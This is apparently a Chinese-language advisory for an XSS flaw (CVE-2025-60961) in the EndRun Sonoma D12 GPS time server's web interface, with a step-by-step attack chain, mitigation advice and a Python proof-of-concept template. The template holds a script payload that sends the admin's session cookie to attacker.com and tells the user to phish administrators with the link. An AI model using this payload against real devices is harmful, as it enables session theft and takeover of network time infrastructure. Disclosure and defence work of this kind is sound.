CVE-2025-60961：EndRun Sonoma D12网络时间服务器XSS漏洞

漏洞信息

漏洞编号

CVE-2025-60961

漏洞类型

跨站脚本攻击（XSS）

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

EndRun Technologies Sonoma D12 Network Time Server (GPS)

漏洞概述

CVE-2025-60961是EndRun Technologies公司生产的Sonoma D12网络时间服务器（GPS）固件中存在的一个跨站脚本（XSS）漏洞。该漏洞影响固件版本F/W 6010-0071-000 Ver 4.00，CVSS 3.1评分为6.1分，属于中危级别漏洞。

Sonoma D12是一款高精度GPS网络时间服务器，广泛应用于企业网络、电信运营商、金融机构和政府部门的精确时间同步场景。该设备通过Web管理界面提供配置和监控功能，管理员可以通过浏览器访问设备进行参数设置、日志查看和状态监控。

该XSS漏洞存在于设备的Web管理界面中，攻击者可以通过构造恶意的URL或输入，在受害者的浏览器中执行任意JavaScript代码。由于该漏洞的攻击向量为网络（AV:N），无需认证（PR:N），且需要用户交互（UI:R），攻击者可以通过社会工程学手段诱使管理员点击恶意链接，从而在管理员的浏览器上下文中执行恶意脚本。

成功利用该漏洞后，攻击者可以窃取敏感信息（如管理员会话凭证、设备配置信息等），并可能对设备进行未授权的操作。由于该漏洞的影响范围（S:C）被标记为Changed，表明攻击可能影响到Web管理界面的安全边界。该漏洞由xdiv-sec安全研究团队发现并报告，披露日期为2025年10月6日。

技术细节

该XSS漏洞存在于Sonoma D12网络时间服务器的Web管理界面中，具体位于处理用户输入的页面组件中。攻击者可以利用该漏洞在受害者的浏览器中注入并执行恶意JavaScript代码。

漏洞原理：Web管理界面在处理用户提交的数据时，未对输入内容进行充分的过滤和转义，导致攻击者可以将恶意脚本代码注入到页面中。当合法用户（管理员）访问包含恶意代码的页面时，浏览器会执行这些代码，从而实现XSS攻击。

利用方式：
1. 攻击者首先构造一个包含恶意JavaScript代码的URL或表单输入；
2. 通过社会工程学手段（如钓鱼邮件、即时消息等）诱使Sonoma D12的管理员点击该恶意链接；
3. 管理员点击后，恶意脚本在其浏览器中执行；
4. 攻击者可以窃取管理员的会话Cookie，进而接管设备的管理权限；
5. 攻击者还可以修改设备配置、获取网络时间同步信息或进行其他恶意操作。

该漏洞的CVSS向量为CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N，表明攻击复杂度低，无需认证即可发起攻击，但需要用户交互（如点击恶意链接）才能触发漏洞利用。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过Shodan、Censys等网络空间搜索引擎发现暴露在公网上的Sonoma D12网络时间服务器，并识别其固件版本为F/W 6010-0071-000 Ver 4.00。

STEP 2

步骤2：漏洞探测

攻击者访问设备的Web管理界面，通过手动测试或自动化扫描工具识别存在XSS漏洞的参数和页面。

STEP 3

步骤3：构造恶意载荷

攻击者构造包含恶意JavaScript代码的URL，该代码用于窃取管理员会话Cookie或执行其他恶意操作。

STEP 4

步骤4：社会工程攻击

攻击者通过钓鱼邮件、即时消息等方式诱使Sonoma D12的管理员点击恶意链接。

STEP 5

步骤5：脚本执行

管理员点击链接后，恶意JavaScript代码在其浏览器上下文中执行，窃取会话凭证。

STEP 6

步骤6：权限获取与持久化

攻击者利用窃取的会话凭证登录设备管理界面，修改配置、植入后门或进行横向移动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-60961 - Sonoma D12 XSS PoC
# Vulnerability: Reflected/Stored Cross-Site Scripting in Web Management Interface
# Affected: EndRun Technologies Sonoma D12 Network Time Server
# Firmware: F/W 6010-0071-000 Ver 4.00

import requests

TARGET_URL = "http://<target-ip>/"
# Replace with the actual vulnerable endpoint discovered during testing
VULNERABLE_ENDPOINT = "<vulnerable_page>"

# Malicious JavaScript payload to steal admin session cookie
PAYLOAD = '<script>document.location="http://attacker.com/steal?cookie="+document.cookie;</script>'

def exploit_xss():
    """
    Exploit the XSS vulnerability by injecting malicious script
    through the vulnerable parameter in the web interface.
    """
    # Construct the malicious URL
    malicious_url = f"{TARGET_URL}{VULNERABLE_ENDPOINT}?param={PAYLOAD}"
    
    print(f"[+] Crafted malicious URL: {malicious_url}")
    print("[+] Send this URL to the admin via phishing or social engineering")
    print("[+] When admin clicks, the script executes and steals the session cookie")
    
    # Verify the endpoint is reachable
    try:
        response = requests.get(TARGET_URL, timeout=5)
        print(f"[+] Target reachable, status code: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Target unreachable: {e}")

if __name__ == "__main__":
    exploit_xss()

影响范围

EndRun Technologies Sonoma D12 Network Time Server F/W 6010-0071-000 Ver 4.00

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）限制Sonoma D12设备的Web管理界面的网络访问范围，仅允许受信任的管理主机通过ACL或防火墙规则访问；2）避免通过邮件或即时消息点击与设备管理相关的可疑链接；3）使用单独的浏览器配置文件或专用浏览器访问设备管理界面，并在使用后清除Cookie；4）监控设备管理账户的异常登录和操作日志；5）考虑使用VPN接入内网后再访问设备管理界面。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-60961
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-60961
3 Details https://www.cvedetails.com/cve/CVE-2025-60961/
4 VulDB https://vuldb.com/cve/CVE-2025-60961
5 Link http://endrun.com
6 Link http://sonoma.com
7 Link https://xdiv-sec.github.io/vulnerability-research/advisories/2025-10-03-sonoma-d12